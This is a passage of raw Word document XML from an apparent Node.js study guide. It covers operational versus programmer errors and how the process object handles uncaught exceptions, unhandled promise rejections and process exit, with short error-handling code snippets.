    <w:p w14:paraId="2DCB90A3" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Degradation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provide fallback mechanisms to maintain functionality even if some components fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75787C14" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set up monitoring and alerting systems to notify administrators of issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3CF451"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Programmer Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F759460"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Programmer errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are issues that arise from flaws or mistakes in the code itself. These errors are typically introduced during the development process and are the result of logical errors, incorrect assumptions, or misunderstandings by the programmer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA159E"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC3A38" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Code Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Result from bugs or defects in the code that lead to incorrect behavior or crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D425ECC" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reproducible</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Often reproducible in development and testing environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B7388" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Code Review and Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can be identified and fixed through code reviews and thorough testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CBDD76"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB9C10" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Syntax Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Incorrect code syntax that prevents the program from running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EBB07" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Null Reference Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Attempting to access properties or methods on null or undefined objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79C244" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logic Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Flaws in the code logic that lead to incorrect results or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E873D" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Array Index Out of Bounds</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Accessing an array index that is outside the valid range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33371583"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Handling Programmer Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63412113" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unit Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Write and run unit tests to catch errors early in the development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549EB19D" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Code Reviews</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Conduct code reviews to identify and fix potential issues before they reach production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6710BA76" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Debugging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use debugging tools and techniques to diagnose and fix issues during development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CE2653"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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0EF62" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="570"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Operational Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Arise from external conditions and factors beyond the developer's control. They are typically managed with retry mechanisms, graceful degradation, and alerting systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C430A" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="570"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Programmer Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Result from mistakes or defects in the code itself. They are managed through code reviews, unit testing, and debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C921BD" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61350E37" w14:textId="574CBE5E" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc178383347"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How does the try...catch block work in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="69083C10" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="079610EA" w14:textId="5D9B2626" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Toc178383348"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the role of the process object in error handling?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="744C8839"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lastRenderedPageBreak/>
        <w:t>In Node.js, the process object plays a significant role in error handling, especially for handling uncaught exceptions and unhandled promise rejections. It provides global-level error management that is crucial for maintaining application stability and diagnosing issues. Here’s how the process object is used in error handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712FB9A"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1. Handling Uncaught Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B1763"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Uncaught exceptions are errors that occur and are not handled by any try/catch block. When an exception is thrown and not caught, the Node.js process will emit an uncaughtException event. You can listen for this event using the process.on() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392BEF03"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D063A"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0864CB7F"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 Perform cleanup if necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF743F"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process.exit(1); // Exit process to prevent inconsistent state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B55B4"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36939270"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Important Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665A76E" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cleanup and Exit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> It's generally recommended to perform any necessary cleanup and then exit the process. Node.js may be left in an inconsistent state after an uncaught exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D51183" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Overuse:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relying heavily on uncaughtException is not a substitute for proper error handling in your application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D8D4E"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2. Handling Unhandled Promise Rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2C474"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Unhandled promise rejections occur when a promise is rejected and the rejection is not handled by a .catch() method or an async/await try/catch block. Starting with Node.js v15, unhandled promise rejections are treated as exceptions and the process will terminate by default if they are not handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB0EB6"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D02312"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console.error('Unhandled Rejection at:', promise, 'reason:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE6A45"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 Perform cleanup if necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569F8ECA"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process.exit(1); // Exit process to prevent inconsistent state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4235BE4A"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22D1EDBC"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Important Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99F865" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> As of Node.js v15, unhandled rejections are treated as fatal errors, so it is crucial to handle promise rejections properly within your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB3640" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deprecation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> As of Node.js v15, unhandledRejection may terminate the process depending on the --unhandled-rejections flag setting, and this behavior may change in future Node.js versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCFCE3"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3. Exiting the Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783E3673"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The process.exit() method is used to terminate the Node.js process. It takes an optional exit code as an argument, where 0 indicates success and any non-zero value indicates an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9522D1" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8"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process.exit(1); // Exit with an error code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66656C5D"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Important Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB0DB7" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
